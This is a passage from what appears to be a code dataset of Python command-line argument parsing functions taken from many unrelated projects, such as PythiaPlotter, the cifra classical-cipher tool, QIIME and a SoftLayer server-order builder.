a.startswith(\"-\"):\n if len(a) > 2:\n insert(args, a[1], a[2:])\n else:\n i += 1\n insert(args, a[1], mixed_args[i])\n else:\n opts.append(a)\n i += 1\n \n return opts, args", "def get_input_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--json_path', type=str, default='cat_to_name.json', \n help='Json path of labels to categories')\n parser.add_argument('--use_gpu', type=bool, default=False, \n help='Run with GPU')\n parser.add_argument('--topk', type=int, default=5, \n help='Top N classes that needed to be displayed')\n parser.add_argument('--image_path', type=str, default='C:/Users/TsalikiK/Downloads/Kantar/Kantar_Python_Work/Notebooks/aipnd-project/test/1/image_06743.jpg', \n help='Image which you want to predict')\n\n # returns parsed argument collection\n return parser.parse_args()", "def parse_options():\n\n parser = optparse.OptionParser(description='PySpark WordCount.')\n parser.add_option('-i', '--input', action='store', nargs=1,\n default='s3://dimajix-training/data/alice/',\n help='Input file or directory')\n parser.add_option('-o', '--output', action='store', nargs=1,\n default='alice-counts',\n help='Output file or directory')\n\n (opts, args) = parser.parse_args()\n\n return opts", "def handle_cmdline_args():\n\n parser = argparse.ArgumentParser(\n description='Generate synthetic data from a specification in a json '\n 'file using the \"synth-method\" described in the json file. ')\n\n parser.add_argument(\n '-i', dest='infile', required=True,\n help='The input json file. Must contain a \"synth-method\" property')\n\n parser.add_argument(\n '-o', dest='outfile_prefix', required=True, help='The prefix of the output paths (data json and csv), relative to the QUIPP-pipeline root directory')\n\n args = parser.parse_args()\n return args", "def get_args(input_args):\n\n parser = argparse.ArgumentParser(\n prog=\"PythiaPlotter\",\n description=\"Convert MC event into a particle evolution diagram. \"\n \"Requires you to choose an input format, and an output printer.\",\n formatter_class=argparse.RawTextHelpFormatter\n )\n\n #################\n # Input options\n #################\n input_group = parser.add_argument_group('Input Options')\n\n input_group.add_argument(\"input\",\n help=\"Input file\")\n\n parser_help = [\"Input formats:\"]\n for k, v in parser_opts.items():\n help_str = \"{0}: {1}\".format(k, v.description)\n if v.file_extension:\n help_str += \" (default for files ending in {})\".format(v.file_extension)\n parser_help.append(help_str)\n\n input_group.add_argument(\"--inputFormat\",\n help=\"\\n\".join(parser_help),\n choices=list(parser_opts.keys()))\n input_group.add_argument(\"-n\", \"--eventNumber\",\n help=\"Select event number to plot, starts at 1.\\n\"\n \"For: HEPMC, LHE input formats.\\n\",\n type=int,\n default=0)\n\n #################\n # Output file options\n #################\n output_group = parser.add_argument_group('Output Diagram Options')\n\n output_group.add_argument(\"-O\", \"--output\",\n help=\"Output diagram filename \"\n \"(if unspecified, defaults to INPUT.pdf)\")\n output_group.add_argument(\"--outputFormat\",\n help=\"Output diagram file format (defaults to \"\n \"extension given to --output)\")\n output_group.add_argument(\"--open\",\n help=\"Automatically open diagram once plotted\",\n action=\"store_true\")\n\n #################\n # Printer options\n #################\n output_group.add_argument(\"--noOutput\",\n help=\"Don't convert Graphviz file to diagram\",\n action=\"store_true\")\n\n output_group.add_argument(\"-r\", \"--representation\",\n help=\"Particle representation for output diagram, \"\n \"either representated by Nodes or as Edges\",\n choices=helpr.VALID_REPRESENTATIONS)\n\n layouts = OrderedDict()\n layouts[\"dot\"] = \"(Default) Hierarchical drawings of directed graphs.\"\n layouts[\"neato\"] = \"'Spring model' layout by minimizing a global energy function.\"\n layouts[\"fdp\"] = \"'Spring model' layout by reducing forces.\"\n layouts[\"sfdp\"] = \"Multiscale version of fdp for the layout of large graphs.\"\n layouts[\"twopi\"] = \"Radial layout. Nodes are placed on concentric circles \" \\\n \"depending their distance from a given root node.\"\n layouts[\"circo\"] = \"Circular layout.\"\n layout_help = [\"{}: {}\".format(k, v) for k, v in layouts.items()]\n output_group.add_argument(\"--layout\",\n help=(\"Algorithm to use for arranging nodes & edges:\\n\"\n + \"\\n\".join(layout_help)),\n choices=list(layouts.keys()),\n default=\"dot\")\n\n output_group.add_argument(\"--title\",\n help=\"Title to put on the plot\",\n default=\"\")\n\n printer_help = [\"Printing methods:\"]\n printer_help.extend([\"{0}: {1}\".format(k, v.description)\n for k, v in printer_opts_checked.items()])\n output_group.add_argument(\"-p\", \"--printer\",\n help=\"\\n\".join(printer_help),\n choices=list(printer_opts_checked.keys()),\n default=\"DOT\" if \"DOT\" in printer_opts_checked else \"WEB\")\n\n output_group.add_argument(\"--redundants\",\n help=\"Keep redundant particles (defualt is to remove them)\",\n action=\"store_true\")\n\n output_group.add_argument(\"--saveGraphviz\",\n help=\"Save intermediate GraphViz file (for testing puposes, \"\n \"or quick style edits)\",\n action=\"store_true\")\n\n #################\n # Miscellaneous options\n #################\n misc_group = parser.add_argument_group(\"Miscellaneous Options\")\n dump_config_key = \"--dumpConfig\"\n misc_group.add_argument(dump_config_key,\n help=\"Dump the default config file. User can then modify it, \"\n \"and use it via --configFile.\")\n misc_group.add_argument(\"--configFile\",\n help=\"Configuration file to use\")\n misc_group.add_argument(\"-v\", \"--verbose\",\n help=\"Print debug statements to screen\",\n action=\"store_true\")\n misc_group.add_argument(\"--stats\",\n help=\"Print some statistics about the event/graph\",\n action=\"store_true\")\n misc_group.add_argument('--version', action='version', version='%(prog)s ' + __version__)\n\n # Handle the scenario where there are no printers available\n if len(printer_opts_checked) == 0:\n parser.print_help()\n log.info(\"\")\n log.error(\"None of the required programs or python packages \"\n \"for any printing option exist.\")\n print_printers_requirements(log.info)\n exit(11)\n\n # Can generate default config file and exit before doing any parsing\n if dump_config_key in sys.argv:\n dump_default_config()\n exit(0)\n\n args = parser.parse_args(input_args)\n\n if args.verbose:\n logging.getLogger().setLevel(logging.DEBUG)\n\n args.input = helpr.cleanup_filepath(args.input) # sanitise input\n\n if not helpr.check_file_exists(args.input):\n raise IOError(\"No such file: '%s'\" % args.input)\n\n # Post process user args\n set_default_output_settings(args)\n set_default_input_format(args)\n set_default_mode(args)\n load_default_user_configs(args)\n\n for k, v in args.__dict__.items():\n log.debug(\"%s: %s\", k, v)\n\n return args", "def parse_args():\n usage = (\"Usage: python driver.py k-number-of-output-colors \"\n \"{kmeans, kmeans++} /path/to/image.jpg\")\n assert len(sys.argv) >= 2, \"Too few arguements. \" + usage\n\n # Determine k\n assert sys.argv[1].isdigit(), (\"k-number-of-output-colors needs to be a \"\n \"digit. \" + usage)\n k = int(sys.argv[1])\n\n # Determine algorithm type (optional input)\n try:\n assert sys.argv[2] in {\"kmeans\", \"kmeans++\"}, (\"Invalid algorithm \"\n \"type. \" + usage)\n algorithm_type = sys.argv[2]\n except IndexError:\n print \"No algorithm type given in args; using default algorithm 'kmeans'\"\n algorithm_type = \"kmeans\"\n \n # Determine image path (optional input)\n try:\n img_path = sys.argv[3]\n except IndexError:\n print \"No image path given in args; using default image './park.jpg'\"\n img_path = \"./park.jpg\"\n\n return k, algorithm_type, img_path", "def retrieve_args_dict():\n process_args = sys.argv[1:]\n dictionary = dict()\n for process_arg in process_args:\n splitted = process_arg.split(\":\")\n if len(splitted) > 1:\n key = splitted[0]\n value = \"\".join(splitted[1:])\n dictionary[key] = value\n return dictionary", "def extract_info_from_arguments(self):\r\n\r\n for sample_name in self.arguments['--sample_name']:\r\n self.list_of_samples_to_be_combined.append(sample_name)\r\n\r\n for file_path in self.arguments['--input_file']:\r\n file_object = Input_file(file_path, self.list_of_samples_to_be_combined)\r\n self.indices.update(file_object.indices)\r\n self.list_of_input_files.append(file_object)\r\n self.list_of_input_files_paths.append(file_path)\r\n\r\n if self.arguments['--out']:\r\n if self.arguments['--output_format'] == 'COMPRESSED':\r\n self.compressed = True\r\n elif self.arguments['--output_format'] == 'UNCOMPRESSED':\r\n self.compressed = False\r\n else:\r\n if self.list_of_input_files[0].compressed:\r\n self.compressed = True\r\n else:\r\n self.compressed = False", "def __set_parser__(parser):\n #parser.add_argument('dictionaryFile', metavar='DSL_FILE', type=argparse.FileType('r', encoding='utf-16le'), help=\"a DSL dictionary file\")\n parser.add_argument('dictionaryFile', metavar='DSL_FILE', help=\"a DSL dictionary file\")\n subgroup_opath = parser.add_mutually_exclusive_group()\n subgroup_opath.add_argument('outputDictionaryPath', metavar='OUTPUT_DIR', nargs='?', default=os.getcwd(),\n help=\"Use an OUTPUT_DIR to place Apple Dictionary Service folder (uses current directory by default)\")\n parser.add_argument('-v', '--verbose', action='count', default=0,\n help=\"Increases output verbosity\")\n group = parser.add_argument_group('Fine tuning')\n subgroup_ann = group.add_mutually_exclusive_group()\n subgroup_ann.add_argument('--annotation', metavar='FILE', dest='annotationFile', default=None,\n help=\"Use FILE as annotation file\")\n subgroup_ann.add_argument('--no-annotation', dest='annotationFile', action='store_false',\n help=\"Ignore annotation files\")\n subgroup_abrv = group.add_mutually_exclusive_group()\n subgroup_abrv.add_argument('--abbreviations', metavar='FILE', dest='abbreviationsFile', default=None,\n help=\"Use FILE as abbreviations file\")\n subgroup_abrv.add_argument('--no-abbreviations', dest='abbreviationsFile', action='store_false',\n help=\"Ignore abbreviations files\")\n group.add_argument('--name', metavar='NAME', dest='dictionaryName', help=\"set dictionary name\")\n #subgroup_media = group.add_mutually_exclusive_group()\n #subgroup_media.add_argument('--no-media', action='store_true', dest='media',\n #help=\"Skip media entries\")\n #ubgroup_media.add_argument('--media', metavar='TYPE', choices=['wav', 'mp3', 'm4a', 'aac'],\n #help=\"Change media type to TYPE. Supported formats are \\'wav\\', \\'mp3\\', \\'m4a\\', and \\'aac\\'\")\n group.add_argument('--encoding', metavar='ENCODING', default='utf-16', choices=['utf-8', 'utf-16', 'utf-16le', 'utf-16be'],\n help=\"Set DSL dictionary encoding, suppored encodings are \\'utf-8\\' and \\'utf-16\\' (default). If in latter encoding the Byte Order Mark is is missing use \\'utf-16le\\' or \\'utf-16be\\'.\")\n parser.add_argument('--version', action='version', version=\"lexicamaker v%s\" % __version__ ) #\"%(prog)s v{}\".format(__version__))\n subgroup_opath.add_argument('--remote', action='store_true',\n help=\"Forces to place the Apple Dictionary Service folder next to main DSL_FILE dictionary\")", "def handle_args():\n usage = \"\"\"usage: %prog [options] transient_id voevent_stream_id outputname.xml\"\"\"\n parser = optparse.OptionParser(usage)\n\n dbname_default = tkp.config.config['database']['name']\n parser.add_option(\"--dbname\", default=dbname_default,\n help=\"Database name, default: \" + dbname_default)\n\n options, args = parser.parse_args()\n if len(args) != 3:\n parser.print_help()\n sys.exit(1)\n print \"Generating VOEvent for transient id:\", args[0]\n return options, args", "def parse_args_dict(args=None):\n return vars(parse_args(args))", "def parse_arguments(args: list = None) -> Dict[str, str]:\n arg_parser = argparse.ArgumentParser(description=\"Console command to crypt \"\n \"and decrypt texts using \"\n \"classic methods. It also \"\n \"performs crypto attacks \"\n \"against those methods.\\n\",\n epilog=\"Follow cifra development at: \"\n \"<https://github.com/dante-signal31/cifra>\")\n cifra_subparsers = arg_parser.add_subparsers(help=\"Available modes\",\n dest=\"mode\",\n required=True)\n # DICTIONARY MANAGEMENT.\n dictionary_parser = cifra_subparsers.add_parser(name=\"dictionary\",\n help=\"Manage dictionaries to \"\n \"perform crypto attacks.\")\n dictionary_actions_subparser = dictionary_parser.add_subparsers(help=\"Action to perform.\",\n dest=\"action\")\n # DICTIONARY CREATION.\n dictionary_create_parser = dictionary_actions_subparser.add_parser(name=\"create\",\n help=\"Create a dictionary of unique words.\")\n dictionary_create_parser.add_argument(\"dictionary_name\",\n type=str,\n help=\"Name for the dictionary to create.\",\n metavar=\"NEW_DICTIONARY_NAME\")\n dictionary_create_parser.add_argument(\"-i\", \"--initial_words_file\",\n type=_check_is_file,\n help=\"Optionally you can load in the dictionary words located in a text file\",\n metavar=\"PATH_TO FILE_WITH_WORDS\")\n # DICTIONARY REMOVAL.\n dictionary_delete_parser = dictionary_actions_subparser.add_parser(name=\"delete\",\n help=\"Remove an existing dictionary.\")\n dictionary_delete_parser.add_argument(\"dictionary_name\",\n type=str,\n help=\"Name for the dictionary to delete.\",\n metavar=\"DICTIONARY_NAME_TO_DELETE\")\n # DICTIONARY UPDATING.\n dictionary_update_parser = dictionary_actions_subparser.add_parser(name=\"update\",\n help=\"Add words to an existing dictionary.\")\n dictionary_update_parser.add_argument(\"dictionary_name\",\n type=str,\n help=\"Name for the dictionary to update with additional words.\",\n metavar=\"DICTIONARY_NAME_TO_UPDATE\")\n dictionary_update_parser.add_argument(\"words_file\",\n type=_check_is_file,\n help=\"Pathname to a file with words to add to dictionary\",\n metavar=\"PATH_TO_FILE_WITH_WORDS\")\n # DICTIONARY LISTING.\n _ = dictionary_actions_subparser.add_parser(name=\"list\",\n help=\"Show existing dictionaries.\")\n # CIPHER MANAGEMENT.\n cipher_parser = cifra_subparsers.add_parser(name=\"cipher\",\n help=\"Cipher a text using a key.\")\n cipher_parser.add_argument(\"algorithm\",\n choices=CIPHERING_ALGORITHMS,\n type=str,\n help=\"Algorithm to use to cipher.\",\n metavar=\"ALGORITHM_NAME\")\n cipher_parser.add_argument(\"key\",\n type=str,\n help=\"Key to use to cipher.\",\n metavar=\"CIPHERING_KEY\")\n cipher_parser.add_argument(\"file_to_cipher\",\n type=_check_is_file,\n help=\"Path to file with text to cipher.\",\n metavar=\"FILE_TO_CIPHER\")\n cipher_parser.add_argument(\"-o\", \"--ciphered_file\",\n type=str,\n help=\"Path to output file to place ciphered text. If not used then\"\n \"ciphered text will be dumped to console.\",\n metavar=\"OUTPUT_CIPHERED_FILE\")\n cipher_parser.add_argument(\"-c\", \"--charset\",\n type=str,\n help=f\"Default charset is: {cifra.cipher.common.DEFAULT_CHARSET}, but you can set here \"\n f\"another.\",\n metavar=\"CHARSET\")\n # DECIPHERING MANAGEMENT\n decipher_parser = cifra_subparsers.add_parser(name=\"decipher\",\n help=\"Decipher a text using a key.\")\n decipher_parser.add_argument(\"algorithm\",\n choices=CIPHERING_ALGORITHMS,\n type=str,\n help=\"Algorithm to use to decipher.\",\n metavar=\"ALGORITHM_NAME\")\n decipher_parser.add_argument(\"key\",\n type=str,\n help=\"Key to use to decipher.\",\n metavar=\"CIPHERING_KEY\")\n decipher_parser.add_argument(\"file_to_decipher\",\n type=_check_is_file,\n help=\"Path to file with text to decipher.\",\n metavar=\"FILE_TO_DECIPHER\")\n decipher_parser.add_argument(\"-o\", \"--deciphered_file\",\n type=str,\n help=\"Path to output file to place deciphered text. If not used then\"\n \"deciphered text will be dumped to console.\",\n metavar=\"OUTPUT_DECIPHERED_FILE\")\n decipher_parser.add_argument(\"-c\", \"--charset\",\n type=str,\n help=f\"Default charset is: {cifra.cipher.common.DEFAULT_CHARSET}, but you can set here \"\n f\"another.\",\n metavar=\"CHARSET\")\n # ATTACK MANAGEMENT\n attack_parser = cifra_subparsers.add_parser(name=\"attack\",\n help=\"Attack a ciphered text to get its plain text\")\n attack_parser.add_argument(\"algorithm\",\n choices=CIPHERING_ALGORITHMS,\n type=str,\n help=\"Algorithm to attack.\",\n metavar=\"ALGORITHM_NAME\")\n attack_parser.add_argument(\"file_to_attack\",\n type=_check_is_file,\n help=\"Path to file with text to attack.\",\n metavar=\"FILE_TO_ATTACK\")\n attack_parser.add_argument(\"-o\", \"--deciphered_file\",\n type=str,\n help=\"Path to output file to place deciphered text. If not used then\"\n \"deciphered text will be dumped to console.\",\n metavar=\"OUTPUT_DECIPHERED_FILE\")\n attack_parser.add_argument(\"-c\", \"--charset\",\n type=str,\n help=f\"Default charset is: {cifra.cipher.common.DEFAULT_CHARSET}, but you can set here \"\n f\"another.\",\n metavar=\"CHARSET\")\n\n parsed_arguments = vars(arg_parser.parse_args(args))\n filtered_parser_arguments = {key: value for key, value in parsed_arguments.items()\n if value is not None}\n return filtered_parser_arguments", "def get_parsed_cmd_args(self, test_case=None):\n\n class BooleanAction(argparse.Action):\n \"\"\"Custom action for storing boolean options\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(BooleanAction, self).__init__(*args, **kwargs)\n\n def __call__(self, parser, namespace, value, option_string):\n setattr(namespace, self.dest, value not in [\"False\", \"false\"])\n\n class ArrayAction(argparse.Action):\n \"\"\"Custom action for storing comma seperated arrays\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(ArrayAction, self).__init__(*args, **kwargs)\n\n def __call__(self, parser, namespace, value, option_string):\n setattr(namespace, self.dest, value.split(\",\"))\n\n argument_parser = argparse.ArgumentParser(\n description=\"Encryption identification scanner: \" \\\n + \"scans a set of packages to detect use of encryption algorithms.\",\n epilog=\"For additional information, visit: \" \\\n + \"https://github.com/Wind-River/crypto-detector\")\n\n argument_parser.add_argument(\"--version\", \\\n action='version', version=self.version)\n\n # automatically generate options for methods\n\n for method in Options.available_methods():\n\n method_class = Options.available_methods()[method]\n\n if not hasattr(method_class, \"options\"):\n continue\n\n for option in method_class.options:\n self.options[method + \"_\" + option] = method_class.options[option]\n self.method_options[method + \"_\" + option] = (method, option)\n\n if hasattr(method_class, \"options_help\"):\n self.options_help.update({\n method + \"_\" + option: method_class.options_help[option] \\\n for option in method_class.options_help})\n\n for option in self.options:\n\n if option == \"packages\":\n continue\n\n additional_args = {}\n\n if isinstance(self.options[option], list):\n additional_args[\"action\"] = ArrayAction\n\n elif isinstance(self.options[option], bool):\n additional_args[\"nargs\"] = \"?\"\n additional_args[\"choices\"] = [\"True\", \"true\", \"False\", \"false\"]\n additional_args[\"action\"] = BooleanAction\n\n elif option == \"output_existing\":\n additional_args[\"choices\"] = [\"rename\", \"overwrite\", \"skip\"]\n\n self.parse_cmd_argument(argument_parser, option, additional_args)\n\n argument_parser.add_argument(nargs='*', dest=\"packages\", help=self.options_help[\"packages\"])\n\n if test_case:\n return vars(argument_parser.parse_args(test_case))\n\n return vars(argument_parser.parse_args())", "def process_cmd_opts():\n # def print_version():\n # pkg_name = 'ndn-distributed-repo'\n # version = pkg_resources.require(pkg_name)[0].version\n # print(pkg_name + ' ' + version)\n\n def process_prefix(input_string: str):\n if input_string[-1] == \"/\":\n input_string = input_string[:-1]\n if input_string[0] != \"/\":\n input_string = \"/\" + input_string\n return input_string\n\n def process_others(input_string: str):\n if input_string[-1] == \"/\":\n input_string = input_string[:-1]\n if input_string[0] == \"/\":\n input_string = input_string[1:]\n return input_string\n\n def parse_cmd_opts():\n\n # Command Line Parser\n parser = argparse.ArgumentParser(add_help=False,description=\"ndn-distributed-repo\")\n requiredArgs = parser.add_argument_group(\"required arguments\")\n optionalArgs = parser.add_argument_group(\"optional arguments\")\n informationArgs = parser.add_argument_group(\"information arguments\")\n\n # Adding all Command Line Arguments\n requiredArgs.add_argument(\"-rp\",\"--repoprefix\",action=\"store\",dest=\"repo_prefix\",required=True,help=\"repo (group) prefix. Example: \\\"/samplerepo\\\"\")\n requiredArgs.add_argument(\"-gp\", \"--svsgroupprefix\",action=\"store\",dest=\"svs_group_prefix\",required=True,help=\"prefix of svs group. Example: \\\"/repogroup\\\"\")\n requiredArgs.add_argument(\"-n\", \"--nodename\",action=\"store\",dest=\"node_name\",required=True,help=\"node name. Example: \\\"node01\\\"\")\n requiredArgs.add_argument(\"-s\", \"--sessionid\",action=\"store\",dest=\"session_id\",required=True,help=\"id of this session. Example: \\\"2c4f\\\"\")\n\n # Getting all Arguments\n vars = parser.parse_args()\n args = {}\n\n # Process args\n args[\"repo_prefix\"] = process_prefix(vars.repo_prefix)\n args[\"node_name\"] = process_others(vars.node_name)\n args[\"session_id\"] = process_others(vars.session_id)\n args[\"file_storage\"] = \"~/.ndn/repo/{repo_prefix}/{session_id}/file.db\".format(repo_prefix=args[\"repo_prefix\"], session_id=args[\"session_id\"])\n args[\"global_view_storage\"] = \"~/.ndn/repo/{repo_prefix}/{session_id}/global_view.db\".format(repo_prefix=args[\"repo_prefix\"], session_id=args[\"session_id\"])\n args[\"svs_storage\"] = \"~/.ndn/repo/{repo_prefix}/{session_id}/svs.db\".format(repo_prefix=args[\"repo_prefix\"], session_id=args[\"session_id\"])\n args[\"svs_group_prefix\"] = process_prefix(vars.svs_group_prefix)\n \n return args\n\n args = parse_cmd_opts()\n \"\"\"\n if args.version:\n print_version()\n exit(0)\n \"\"\"\n return args", "def parse_args():\n parser = argparse.ArgumentParser(description=\"generate training data of apks\")\n parser.add_argument(\"-i\", action=\"store\", dest=\"input_file\",\n required=True, help=\"input json file to predict\")\n parser.add_argument(\"-o\", action=\"store\", dest=\"output_file\",\n required=True, help=\"file path to store predicted data\")\n parser.add_argument(\"-server\", action=\"store\", dest=\"server_url\", default=\"http://localhost:5745\",\n required=False, help=\"url of nice2predict server\")\n options = parser.parse_args()\n print options\n return options", "def get_options_lookup():\r\n qiime_config = load_qiime_config()\r\n result = {}\r\n result['fasta_as_primary_input'] =\\\r\n make_option('-i', '--input_fasta_fp', type=\"existing_filepath\",\r\n help='path to the input fasta file')\r\n result['otu_table_as_primary_input'] =\\\r\n make_option('-i', '--otu_table_fp', type=\"existing_filepath\",\r\n help='path to the input OTU table (i.e., the output from make_otu_table.py)')\r\n result['otu_map_as_primary_input'] =\\\r\n make_option('-i', '--otu_map_fp', type=\"existing_filepath\",\r\n help='path to the input OTU map (i.e., the output from pick_otus.py)')\r\n result['log_fp'] =\\\r\n make_option('-l', '--log_fp', type=\"new_filepath\",\r\n help='path to write the log file')\r\n result['input_fasta'] =\\\r\n make_option('-f', '--input_fasta_fp', type=\"existing_filepath\",\r\n help='path to the input fasta file')\r\n result['output_dir'] =\\\r\n make_option('-o', '--output_dir', type=\"new_dirpath\",\r\n help='path to the output directory')\r\n result['output_fp'] =\\\r\n make_option('-o', '--output_fp', type=\"new_filepath\",\r\n help='the output filepath')\r\n result['output_biom_fp'] =\\\r\n make_option('-o', '--output_biom_fp', type=\"new_filepath\",\r\n help='the output otu table in biom format (recommended extension: .biom)')\r\n result['mapping_fp'] =\\\r\n make_option('-m', '--mapping_fp', type=\"existing_filepath\",\r\n help='the mapping filepath')\r\n\r\n # Define options used by the workflow scripts\r\n result['jobs_to_start_workflow'] =\\\r\n make_option('-O', '--jobs_to_start', type='int',\r\n help='Number of jobs to start. NOTE: you must also'\r\n ' pass -a to run in parallel, this defines the number of'\r\n ' jobs to be started if and only if -a is passed'\r\n ' [default: %default]',\r\n default=qiime_config['jobs_to_start'])\r\n\r\n # Define options used by the parallel scripts\r\n result['jobs_to_start'] =\\\r\n make_option('-O', '--jobs_to_start', type='int',\r\n help='Number of jobs to start [default: %default]',\r\n default=qiime_config['jobs_to_start'])\r\n result['retain_temp_files'] =\\\r\n make_option('-R', '--retain_temp_files', action='store_true',\r\n help='retain temporary files after runs complete ' +\r\n '(useful for debugging) [default: %default]',\r\n default=False)\r\n result['suppress_submit_jobs'] =\\\r\n make_option('-S', '--suppress_submit_jobs', action='store_true',\r\n help='Only split input and write commands file - don\\'t submit ' +\r\n 'jobs [default: %default]', default=False)\r\n result['poll_directly'] =\\\r\n make_option('-T', '--poll_directly', action='store_true',\r\n help='Poll directly for job completion rather than running ' +\r\n 'poller as a separate job. If -T is specified this script will ' +\r\n 'not return until all jobs have completed. [default: %default]',\r\n default=False)\r\n result['cluster_jobs_fp'] =\\\r\n make_option('-U', '--cluster_jobs_fp',\r\n help='path to cluster jobs script (defined in qiime_config) ' +\r\n ' [default: %default]',\r\n default=qiime_config['cluster_jobs_fp'] or\r\n 'start_parallel_jobs.py')\r\n result['suppress_polling'] =\\\r\n make_option('-W', '--suppress_polling', action='store_true',\r\n help='suppress polling of jobs and merging of results ' +\r\n 'upon completion [default: %default]',\r\n default=False)\r\n result['job_prefix'] =\\\r\n make_option('-X', '--job_prefix', help='job prefix ' +\r\n '[default: descriptive prefix + random chars]')\r\n result['seconds_to_sleep'] =\\\r\n make_option('-Z', '--seconds_to_sleep', type='int',\r\n help='Number of seconds to sleep between checks for run ' +\r\n ' completion when polling runs [default: %default]',\r\n default=qiime_config['seconds_to_sleep'] or 60)\r\n\r\n return result", "def get_args():\n\n params = {}\n\n if len(argv) == 1:\n\n input_file = input('Please enter the path to the parameter file: ')\n\n else:\n\n input_file = argv[1]\n\n if path.isfile(input_file) == False:\n\n print('ERROR: Cannot find input parameter file')\n exit()\n\n flines = open(input_file,'r').readlines()\n\n str_keys = ['catalog_file', 'red_dir',\n 'target_ra', 'target_dec',\n 'star_class', 'isochrone_file',\n 'target_lc_file_g', 'target_lc_file_r', 'target_lc_file_i']\n\n for line in flines:\n\n (key, value) = line.replace('\\n','').split()\n\n if key in str_keys:\n\n params[key] = value\n\n else:\n\n if 'none' not in str(value).lower():\n params[key] = float(value)\n else:\n params[key] = None\n\n return params", "def get_argument_parser():\n description = (\n \"Create an override for each recipe listed in an Autopkg recipe-list. \"\n \"or a supplied list of recipe identifiers. (Defaults to current \"\n \"user's AutoPkgr recipe_list) . The 'Input' will be renamed to \"\n \"'Input_Original', and a new 'Input' section will be populated with \"\n \"metadata from the most current production version of that product, \"\n \"followed by metadata from the 'Input_Original' for any blank values. \"\n \"Finally, (optionally with -p/--pkginfo), a plist of values is added \"\n \"to the 'Input' 'pkginfo' key.\")\n epilog = (\"Please see the README for use examples and further \"\n \"description. Why don't you cut your hair?\")\n parser = argparse.ArgumentParser(description=description, epilog=epilog)\n arg_help = (\"Path to a location other than your autopkg override-dir \"\n \"to save overrides.\")\n parser.add_argument(\"-o\", \"--override-dir\", help=arg_help)\n\n group = parser.add_mutually_exclusive_group()\n arg_help = (\"Path to a recipe list. If not specified, defaults to use \"\n \"AutoPkgr's recipe_list at \"\n \"~/Library/Application Support/AutoPkgr.\")\n group.add_argument(\"-l\", \"--recipe-list\", help=arg_help)\n arg_help = \"One or more recipe identifiers for which to create overrides.\"\n group.add_argument(\"-r\", \"--recipes\", help=arg_help, nargs=\"+\")\n\n arg_help = (\"Input metadata key names (may specify multiple values) to \"\n \"copy from newest production version to 'Input'. Defaults to: \"\n \"%(default)s\")\n parser.add_argument(\"-k\", \"--keys\", help=arg_help, nargs=\"+\",\n default=METADATA)\n arg_help = (\"Path to a plist file defining override values to enforce. \"\n \"This plist should have a top-level dict element named \"\n \"'pkginfo'. \")\n parser.add_argument(\"-p\", \"--pkginfo\", help=arg_help)\n arg_help = (\"Name of Munki catalog from which to search current pkginfo \"\n \"values. (Defaults to '%(default)s)'\")\n parser.add_argument(\"-c\", \"--catalog\", help=arg_help, default=\"production\")\n arg_help = (\"Skip copying subdirectory information from existing items. \"\n \" Most Munki recipes provide access to the MunkiImporter \"\n \"`repo_subdirectory` argument in the Input section as \"\n \"`MUNKI_REPO_SUBDIR`. By default, easy_rider will use the \"\n \"directory found in the most recent production version of the \"\n \"product to populate the Input value, unless the recipe \"\n \"does not offer that override, or if you suppress that \"\n \"behavior with this option.\")\n parser.add_argument(\"--suppress_subdir\", help=arg_help,\n action=\"store_true\")\n arg_help = (\"Do not interactively prompt for values. When no value exists \"\n \"in the most recent production version of a product, this \"\n \"option instructs easy_rider to just enter a blank string.\")\n parser.add_argument(\"--no_prompt\", help=arg_help, action=\"store_true\")\n arg_help = (\"Instead of using current production value for \"\n \"repo_subdirectory, either prompt for input (no value) or \"\n \"use the value of a pkginfo key (e.g. 'developer' or \"\n \"'category').\")\n parser.add_argument(\"--specify_subdir\", help=arg_help, nargs=\"?\",\n default=\"\", const=\"<PROMPT>\")\n return parser", "def _process_args(self, args, ds_options):\r\n mgr = HardwareManager(self.client)\r\n\r\n order = {\r\n 'hostname': args['--hostname'],\r\n 'domain': args['--domain'],\r\n 'bare_metal': False,\r\n 'package_id': args['--chassis'],\r\n }\r\n\r\n # Determine if this is a \"Bare Metal Instance\" or regular server\r\n bmc = False\r\n if args['--chassis'] == str(mgr.get_bare_metal_package_id()):\r\n bmc = True\r\n\r\n # Convert the OS code back into a price ID\r\n os_price = self._get_price_id_from_options(ds_options, 'os',\r\n args['--os'])\r\n\r\n if os_price:\r\n order['os'] = os_price\r\n else:\r\n raise CLIAbort('Invalid operating system specified.')\r\n\r\n order['location'] = args['--datacenter'] or 'FIRST_AVAILABLE'\r\n\r\n if bmc:\r\n order['server'] = self._get_cpu_and_memory_price_ids(\r\n ds_options, args['--cpu'], args['--memory'])\r\n order['bare_metal'] = True\r\n\r\n if args['--billing'] == 'hourly':\r\n order['hourly'] = True\r\n else:\r\n order['server'] = args['--cpu']\r\n order['ram'] = self._get_price_id_from_options(\r\n ds_options, 'memory', int(args['--memory']))\r\n\r\n # Set the disk sizes\r\n disk_prices = []\r\n disk_number = 0\r\n for disk in args.get('--disk'):\r\n disk_price = self._get_disk_price(ds_options, disk, disk_number)\r\n disk_number += 1\r\n if disk_price:\r\n disk_prices.append(disk_price)\r\n\r\n if not disk_prices:\r\n disk_prices.append(self._get_default_value(ds_options, 'disk0'))\r\n\r\n order['disks'] = disk_prices\r\n\r\n # Set the disk controller price\r\n if not bmc:\r\n if args.get('--controller'):\r\n dc_price = self._get_price_id_from_options(\r\n ds_options, 'disk_controller', args.get('--controller'))\r\n else:\r\n dc_price = self._get_price_id_from_options(ds_options,\r\n 'disk_controller',\r\n 'None')\r\n\r\n order['disk_controller'] = dc_price\r\n\r\n # Set the port speed\r\n port_speed = args.get('--network') or '100'\r\n\r\n nic_price = self._get_price_id_from_options(ds_options, 'nic',\r\n port_speed)\r\n\r\n if nic_price:\r\n order['port_speed'] = nic_price\r\n else:\r\n raise CLIAbort('Invalid NIC speed specified.')\r\n\r\n if args.get('--postinstall'):\r\n order['post_uri'] = args.get('--postinstall')\r\n\r\n # Get the SSH keys\r\n if args.get('--key'):\r\n keys = []\r\n for key in args.get('--key'):\r\n key_id = resolve_id(SshKeyManager(self.client).resolve_ids,\r\n key, 'SshKey')\r\n keys.append(key_id)\r\n order['ssh_keys'] = keys\r\n\r\n if args.get('--vlan_public'):\r\n order['public_vlan'] = args['--vlan_public']\r\n\r\n if args.get('--vlan_private'):\r\n order['private_vlan'] = args['--vlan_private']\r\n\r\n return order", "def parse_args():\n\n areas = list(default_config['areas'].keys())\n\n class ListAreas(argparse.Action):\n \"\"\"Helper class for argparse to list available areas and 